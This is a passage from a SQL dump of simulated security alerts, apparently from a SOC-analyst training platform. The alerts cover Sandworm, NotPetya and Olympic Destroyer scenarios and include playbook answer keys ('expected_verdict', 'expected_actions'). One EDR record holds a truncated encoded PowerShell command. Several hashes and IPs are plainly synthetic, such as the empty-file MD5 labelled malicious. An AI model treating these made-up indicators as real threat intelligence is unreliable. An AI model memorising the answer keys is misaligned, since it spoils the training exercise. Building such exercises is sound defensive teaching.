4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:34:56Z\\\",\\\"event_source\\\":\\\"domain_controller\\\",\\\"location\\\":\\\"Ghana\\\",\\\"internal_ip\\\":\\\"10.25.36.48\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin.ghana\\\",\\\"filename\\\":\\\"notpetya_recovery_tool.exe\\\",\\\"hash\\\":\\\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\\\",\\\"action\\\":\\\"file_restored\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(979, 'Initial Breach Detected in Corporate Network', 'high', 'Network Traffic Analysis', 'The initial breach was identified as a supply chain compromise through a software update from a third-party vendor. This technique is characteristic of Sandworm, known for leveraging compromised software updates to gain initial access. Analysis of network traffic revealed malicious activity originating from a known malicious IP address associated with Sandworm activities.', 'Supply Chain Compromise', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:21:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"destination_port\":443,\"protocol\":\"TLS\",\"detected_threat\":\"Suspicious Software Update\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"update_package_v1.2.exe\",\"user_agent\":\"ThirdPartyUpdater/1.2\",\"malware_family\":\"Sandworm\",\"vendor\":\"CompromisedVendor\"}', '2026-01-17 03:41:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Sandworm activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Corporate internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Sandworm malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update_package_v1.2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File used in a suspicious software 
update.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(980, 'Execution of NotPetya Payload', 'critical', 'Endpoint Detection and Response (EDR)', 'Shortly after the initial breach, NotPetya was executed on multiple endpoints, initiating its destructive payload and encrypting critical files.', 'Destructive Malware Deployment', 'T1486: Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:25:43Z\",\"event_id\":\"EVT-20231011-00002\",\"host_ip\":\"192.168.1.34\",\"malware_name\":\"NotPetya\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\perfc.dat\",\"file_hash\":\"71b6a493388e7d0b40c83ce903bc6b04\",\"attacker_ip\":\"185.92.220.39\",\"username\":\"jdoe\",\"action\":\"File Execution\",\"severity\":\"Critical\",\"message\":\"NotPetya payload executed, initiating encryption of system files.\"}', '2026-01-17 03:41:52', '2026-02-16 17:51:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal host affected by NotPetya execution.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"71b6a493388e7d0b40c83ce903bc6b04\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known NotPetya file hash.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"185.92.220.39\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with previous NotPetya campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\perfc.dat\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Analysis\",\"verdict\":\"malicious\",\"details\":\"File used by NotPetya for destructive purposes.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User associated with 
compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(981, 'Establishing Persistence in Network - Backdoor Installation Detected', 'high', 'Log Analysis', 'Sandworm group has installed backdoors on compromised systems to maintain persistent access. This operation is aimed at re-establishing access points that allow for re-entry, complicating recovery and mitigation efforts.', 'Backdoor Installation', 'T1543: Create or Modify System Process', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"185.23.124.8\",\"destination_ip\":\"10.0.0.55\",\"username\":\"admin_user\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\svchost.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Backdoor installation\",\"description\":\"Malicious file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\"}', '2026-01-17 03:41:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.23.124.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat actor activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Inventory\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for backdoor installation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used by Sandworm.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"svchost.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in masquerading 
attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Administrative account used in unauthorized activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.671Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.23.124.8\\\",\\\"destination_ip\\\":\\\"10.0.0.55\\\",\\\"username\\\":\\\"admin_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Malicious file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.671Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.23.124.8\\\",\\\"destination_ip\\\":\\\"10.0.0.55\\\",\\\"username\\\":\\\"admin_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Malicious 
file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.671Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.23.124.8\\\",\\\"destination_ip\\\":\\\"10.0.0.55\\\",\\\"username\\\":\\\"admin_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Malicious file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.671Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.23.124.8\\\",\\\"destination_ip\\\":\\\"10.0.0.55\\\",\\\"username\\\":\\\"admin_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Malicious file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.671Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.23.124.8\\\",\\\"destination_ip\\\":\\\"10.0.0.55\\\",\\\"username\\\":\\\"admin_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Malicious file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(982, 'Lateral Movement Across Vaccine Production Systems', 'high', 'Active Directory Monitoring', 'Using stolen credentials, attackers moved laterally to infiltrate systems involved in vaccine production, severely disrupting operations.', 'Credential Theft and Use', 'T1078', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"logon_type\":\"Network\",\"source_ip\":\"185.23.56.7\",\"destination_ip\":\"10.0.5.23\",\"username\":\"j.doe\",\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"logon_guid\":\"{1d9b6895-1234-5678-9876-abcdef012345}\",\"hash\":\"3a6eb5e9a76c38b4f9644f2bbf1f2d3c\",\"filename\":\"OlympicDestroyer.exe\",\"additional_info\":{\"source_hostname\":\"Vaccine-Prod-DC\",\"destination_hostname\":\"Vaccine-Prod-Sys01\",\"privileges\":\"SeChangeNotifyPrivilege\",\"malware_tool\":\"Olympic Destroyer\"}}', '2026-01-17 03:41:52', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.23.56.7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Sandworm APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of vaccine production system\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Account credentials used in unauthorized access\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3a6eb5e9a76c38b4f9644f2bbf1f2d3c\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches Olympic Destroyer 
malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"OlympicDestroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File associated with destructive malware activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(983, 'Data Exfiltration of Sensitive Information', 'critical', 'Data Loss Prevention (DLP)', 'The attackers exfiltrated sensitive data, including proprietary research and operational plans, exacerbating the impact of the attack. The activity is attributed to the Sandworm group known for its destructive attacks and targeting of ICS/SCADA systems.', 'Data Theft', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T13:45:32Z\",\"event_id\":\"DLP-EXFIL-23456\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"filename\":\"Operational_Research_Data.pdf\",\"protocol\":\"HTTPS\",\"action\":\"Allowed\",\"data_volume\":\"2GB\",\"alert_trigger\":\"Sensitive Data Exfiltration\",\"malware_associated\":\"NotPetya\",\"attacker_ip\":\"203.0.113.45\"}', '2026-01-17 03:41:52', '2026-02-16 17:51:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP involved in the data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Sandworm group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Operational_Research_Data.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP\",\"verdict\":\"sensitive\",\"details\":\"File containing sensitive operational and research 
data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal user account involved in the exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.673Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T13:45:32Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-23456\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"Operational_Research_Data.pdf\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Allowed\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_associated\\\":\\\"NotPetya\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.673Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T13:45:32Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-23456\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"Operational_Research_Data.pdf\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Allowed\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_associated\\\":\\\"NotPetya\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.673Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T13:45:32Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-23456\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"Operational_Research_Data.pdf\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Allowed\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_associated\\\":\\\"NotPetya\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.673Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T13:45:32Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-23456\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"Operational_Research_Data.pdf\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Allowed\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_associated\\\":\\\"NotPetya\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.673Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T13:45:32Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-23456\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"Operational_Research_Data.pdf\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Allowed\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_associated\\\":\\\"NotPetya\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(984, 'Destructive Actions on Critical Infrastructure', 'critical', 'SCADA System Monitoring', 'A critical alert has been triggered due to the detection of destructive actions targeting ICS/SCADA systems within the pharmaceutical sector. Indicators suggest the involvement of the Sandworm group, known for its expertise in causing physical infrastructure disruptions.', 'ICS/SCADA Targeting', 'T0831', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-21T14:56:43Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.10.15\",\"username\":\"scada_admin\",\"detected_malware\":\"NotPetya\",\"malware_hash\":\"71b6a493388e7d0b3c1f0a3b10a9a9cd\",\"affected_system\":\"ICS_Controller_01\",\"action_taken\":\"Wiper malware executed\",\"file_path\":\"/var/log/scada/ICS_Controller_01.log\",\"event_description\":\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical operations.\"}', '2026-01-17 03:41:52', '2026-02-16 17:51:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with Sandworm group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"ICS/SCADA system targeted by malware.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"scada_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit Logs\",\"verdict\":\"clean\",\"details\":\"Authorized user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"71b6a493388e7d0b3c1f0a3b10a9a9cd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya 
malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.674Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:56:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.15\\\",\\\"username\\\":\\\"scada_admin\\\",\\\"detected_malware\\\":\\\"NotPetya\\\",\\\"malware_hash\\\":\\\"71b6a493388e7d0b3c1f0a3b10a9a9cd\\\",\\\"affected_system\\\":\\\"ICS_Controller_01\\\",\\\"action_taken\\\":\\\"Wiper malware executed\\\",\\\"file_path\\\":\\\"/var/log/scada/ICS_Controller_01.log\\\",\\\"event_description\\\":\\\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical operations.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.674Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:56:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.15\\\",\\\"username\\\":\\\"scada_admin\\\",\\\"detected_malware\\\":\\\"NotPetya\\\",\\\"malware_hash\\\":\\\"71b6a493388e7d0b3c1f0a3b10a9a9cd\\\",\\\"affected_system\\\":\\\"ICS_Controller_01\\\",\\\"action_taken\\\":\\\"Wiper malware executed\\\",\\\"file_path\\\":\\\"/var/log/scada/ICS_Controller_01.log\\\",\\\"event_description\\\":\\\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical 
